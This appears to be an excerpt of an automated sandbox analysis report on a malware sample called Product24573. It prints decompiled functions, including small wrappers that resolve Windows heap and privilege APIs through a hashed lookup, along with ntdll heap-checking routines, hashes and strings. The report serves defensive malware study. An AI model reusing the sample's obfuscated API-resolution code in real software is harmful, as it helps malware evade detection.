                                          • Source File: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_Product24573.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6f107fde87a0e8a750ff240edea467a3f14f8b87ff78edc713b099ff39960363
                                          • Instruction ID: 0263855f051aa3e283c50ba551ccbdc2edf87f179c8fe257d40e8d7a90bbd0ca
                                          • Opcode Fuzzy Hash: 6f107fde87a0e8a750ff240edea467a3f14f8b87ff78edc713b099ff39960363
                                          • Instruction Fuzzy Hash: 07F06DB6604204BFCB20DF99DC81EEB77A9EF88754F108559FD4C97281C636E811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E865 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 443 41e865-41e88a call 41f1b3 445 41e88f-41e8a4 RtlFreeHeap 443->445
                                          C-Code - Quality: 72%
                                          			E0041E865(intOrPtr __eax, void* __ebx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				void* _v117;
				char _t17;

				asm("lds ebp, [esi]");
				 *0x9cc116e9 = __eax;
				 *__edi =  *__edi - __ebx +  *((intOrPtr*)(__esi - 0x2d));
				_t14 = _a4;
				_push(__esi);
				_t8 = _t14 + 0xaa0; // 0xaa0
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t14, _t8,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t17 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t17;
			}





                                          0x0041e868
                                          0x0041e86a
                                          0x0041e86f
                                          0x0041e876
                                          0x0041e87c
                                          0x0041e882
                                          0x0041e88a
                                          0x0041e8a0
                                          0x0041e8a4

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,9F072898,00000000,?), ref: 0041E8A0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_Product24573.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: b94de72b573e1966a3b4a1d5ffd8d631a89efd798ee2835b689f99938b8a0aac
                                          • Instruction ID: db7fe254e23705c02db2d6c613c9e7060c507d673460d2e0dd7a4286191a99f8
                                          • Opcode Fuzzy Hash: b94de72b573e1966a3b4a1d5ffd8d631a89efd798ee2835b689f99938b8a0aac
                                          • Instruction Fuzzy Hash: 79F08CB1640205AFCB14DF69CC45EEB7BA9EF89344F14455AF98897282D231D815CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410043 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00410043(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E004195B3(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                          0x0041005d
                                          0x00410067
                                          0x0041006d
                                          0x0041007c
                                          0x0041006a
                                          0x0041006a
                                          0x0041006a

                                          APIs
                                          • GetUserGeoID.KERNELBASE(00000010), ref: 0041006D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_Product24573.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: User
                                          • String ID:
                                          • API String ID: 765557111-0
                                          • Opcode ID: 6840ff3954171594db79a7b87b7635f560bde1a2aabe693af1b59c88e19e6c7a
                                          • Instruction ID: ada836e890b82e0dd553c32112272efd72bacd2a7c40ed4153c4fba82fb23b99
                                          • Opcode Fuzzy Hash: 6840ff3954171594db79a7b87b7635f560bde1a2aabe693af1b59c88e19e6c7a
                                          • Instruction Fuzzy Hash: 13E0C27368030466FA2091A59C42FB6364F5B84B00F048475F90CE62C2D5A8E8C00018
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E873 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041E873(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xaa0; // 0xaa0
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                          0x0041e882
                                          0x0041e88a
                                          0x0041e8a0
                                          0x0041e8a4

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,9F072898,00000000,?), ref: 0041E8A0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_Product24573.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                          • Instruction ID: 1886f6a66617dfe5414ac9ff53834b0e5857080f48b025a3e0b38d79a8bd7b6d
                                          • Opcode Fuzzy Hash: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                          • Instruction Fuzzy Hash: 10E012B2200208ABCB14EF89DC49EA737ACAF88754F018059BE095B282C630E914CAF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E833 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041E833(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                          0x0041e842
                                          0x0041e84a
                                          0x0041e860
                                          0x0041e864

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00418C69,?,00419410,00419410,?,00418C69,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E860
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_Product24573.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                          • Instruction ID: df2cfb87f9ff2096fd868703bf6a6fcec91ae6a8f85b57d06528ce7919eb225c
                                          • Opcode Fuzzy Hash: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                          • Instruction Fuzzy Hash: 36E012B2210208ABCB14EF89DC45EA737ACAF88664F018059BE085B242C630F9148AF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E9D3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041E9D3(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F1B3( *((intOrPtr*)(_a4 + 0x764)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x764)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                          0x0041e9ed
                                          0x0041ea03
                                          0x0041ea07

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FE95,0040FE95,?,00000000,?,?), ref: 0041EA03
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_Product24573.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: e363481e85907f674112753f3c70bf454170a1c5c2cc0076f0ceacd14441f91a
                                          • Instruction ID: 942ffc3d2e0f3bdfb5ddf09c923354268ae6cb2a01bd98db3201c95a286cb933
                                          • Opcode Fuzzy Hash: e363481e85907f674112753f3c70bf454170a1c5c2cc0076f0ceacd14441f91a
                                          • Instruction Fuzzy Hash: D6E01AB1600304ABC710DF49CC45EE737ADEF88654F014065BE0D57242C635F8148AF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0113967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7d411464b77ca5f1664926a182fe516bcea6b3cfc81b2010e41f146d69c2450a
                                          • Instruction ID: a3142964848c32c0edf81acb4726d25ced7dceb99ff0f8a67fec9d76aa3347d6
                                          • Opcode Fuzzy Hash: 7d411464b77ca5f1664926a182fe516bcea6b3cfc81b2010e41f146d69c2450a
                                          • Instruction Fuzzy Hash: F1B09BF19064C5C6DE15D7A457087177D0477D0755F16C055D1020681F4778C091F5B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 011AB260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Strings
                                          • *** enter .exr %p for the exception record, xrefs: 011AB4F1
                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 011AB352
                                          • a NULL pointer, xrefs: 011AB4E0
                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 011AB305
                                          • The resource is owned exclusively by thread %p, xrefs: 011AB374
                                          • The instruction at %p tried to %s , xrefs: 011AB4B6
                                          • Go determine why that thread has not released the critical section., xrefs: 011AB3C5
                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 011AB47D
                                          • *** then kb to get the faulting stack, xrefs: 011AB51C
                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 011AB39B
                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 011AB2F3
                                          • *** enter .cxr %p for the context, xrefs: 011AB50D
                                          • The resource is owned shared by %d threads, xrefs: 011AB37E
                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 011AB38F
                                          • *** Inpage error in %ws:%s, xrefs: 011AB418
                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 011AB314
                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 011AB53F
                                          • an invalid address, %p, xrefs: 011AB4CF
                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 011AB476
                                          • write to, xrefs: 011AB4A6
                                          • read from, xrefs: 011AB4AD, 011AB4B2
                                          • This failed because of error %Ix., xrefs: 011AB446
                                          • *** An Access Violation occurred in %ws:%s, xrefs: 011AB48F
                                          • <unknown>, xrefs: 011AB27E, 011AB2D1, 011AB350, 011AB399, 011AB417, 011AB48E
                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 011AB3D6
                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 011AB323
                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 011AB2DC
                                          • The critical section is owned by thread %p., xrefs: 011AB3B9
                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 011AB484
                                          • The instruction at %p referenced memory at %p., xrefs: 011AB432
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                          • API String ID: 0-108210295
                                          • Opcode ID: 248d6b1839c1578fce94b0f0308ab6c9160916ff4f9dc09617de32e4dcfe2258
                                          • Instruction ID: 66e545a4cb342a2d4029fdc92aec9ecf3e26d8de2969eea71d31d155a7a244dd
                                          • Opcode Fuzzy Hash: 248d6b1839c1578fce94b0f0308ab6c9160916ff4f9dc09617de32e4dcfe2258
                                          • Instruction Fuzzy Hash: 76812579A08200FFDB2EBA4BCC49D7B3F66EF56A95F818049F5062F112D3618451CBB6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011B1C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 44%
                                          			E011B1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x10d48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E010FB150();
				} else {
					E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x11e589c);
				E010FB150("Heap error detected at %p (heap handle %p)\n",  *0x11e58a0);
				_t27 =  *0x11e5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M011B1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E010FB150();
				} else {
					E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E010FB150("Error code: %d - %s\n",  *0x11e5898);
				_t113 =  *0x11e58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010FB150();
					} else {
						E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010FB150("Parameter1: %p\n",  *0x11e58a4);
				}
				_t115 =  *0x11e58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010FB150();
					} else {
						E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010FB150("Parameter2: %p\n",  *0x11e58a8);
				}
				_t117 =  *0x11e58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010FB150();
					} else {
						E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010FB150("Parameter3: %p\n",  *0x11e58ac);
				}
				_t119 =  *0x11e58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010FB150();
					} else {
						E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x11e58b4);
					E010FB150("Last known valid blocks: before - %p, after - %p\n",  *0x11e58b0);
				} else {
					_t120 =  *0x11e58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E010FB150();
				} else {
					E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E010FB150("Stack trace available at %p\n", 0x11e58c0);
			}











                                          0x011b1c10
                                          0x011b1c16
                                          0x011b1c1e
                                          0x011b1c3d
                                          0x011b1c3e
                                          0x011b1c20
                                          0x011b1c35
                                          0x011b1c3a
                                          0x011b1c44
                                          0x011b1c55
                                          0x011b1c5a
                                          0x011b1c65
                                          0x011b1c67
                                          0x00000000
                                          0x011b1c6e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011b1c67
                                          0x011b1cdc
                                          0x011b1ce5
                                          0x011b1d04
                                          0x011b1d05
                                          0x011b1ce7
                                          0x011b1cfc
                                          0x011b1d01
                                          0x011b1d0b
                                          0x011b1d17
                                          0x011b1d1f
                                          0x011b1d25
                                          0x011b1d30
                                          0x011b1d4f
                                          0x011b1d50
                                          0x011b1d32
                                          0x011b1d47
                                          0x011b1d4c
                                          0x011b1d61
                                          0x011b1d67
                                          0x011b1d68
                                          0x011b1d6e
                                          0x011b1d79
                                          0x011b1d98
                                          0x011b1d99
                                          0x011b1d7b
                                          0x011b1d90
                                          0x011b1d95
                                          0x011b1daa
                                          0x011b1db0
                                          0x011b1db1
                                          0x011b1db7
                                          0x011b1dc2
                                          0x011b1de1
                                          0x011b1de2
                                          0x011b1dc4
                                          0x011b1dd9
                                          0x011b1dde
                                          0x011b1df3
                                          0x011b1df9
                                          0x011b1dfa
                                          0x011b1e00
                                          0x011b1e0a
                                          0x011b1e13
                                          0x011b1e32
                                          0x011b1e33
                                          0x011b1e15
                                          0x011b1e2a
                                          0x011b1e2f
                                          0x011b1e39
                                          0x011b1e4a
                                          0x011b1e02
                                          0x011b1e02
                                          0x011b1e08
                                          0x00000000
                                          0x00000000
                                          0x011b1e08
                                          0x011b1e5b
                                          0x011b1e7a
                                          0x011b1e7b
                                          0x011b1e5d
                                          0x011b1e72
                                          0x011b1e77
                                          0x011b1e95

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                          • API String ID: 0-2897834094
                                          • Opcode ID: 1ba491f324da3bde799f681d1e504ab25f0deac8db466bdab364261c896a7813
                                          • Instruction ID: a59a199c9ae36a5aa5e0750bfcb8bfbdb3b6d9b790c20c26c487c0c1aca19bc5
                                          • Opcode Fuzzy Hash: 1ba491f324da3bde799f681d1e504ab25f0deac8db466bdab364261c896a7813
                                          • Instruction Fuzzy Hash: 9861C337511159EFD26DAB8AE4D9EA473E5FB04920B4F803EF6895F602D73498808F0B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011B4AEF Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E011B4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E010FB150();
						} else {
							E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E010FB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E010FB150();
					} else {
						E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E011AFA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E010FB150();
						} else {
							E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E010FB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E010FB150();
								} else {
									E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E010FB150();
									} else {
										E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
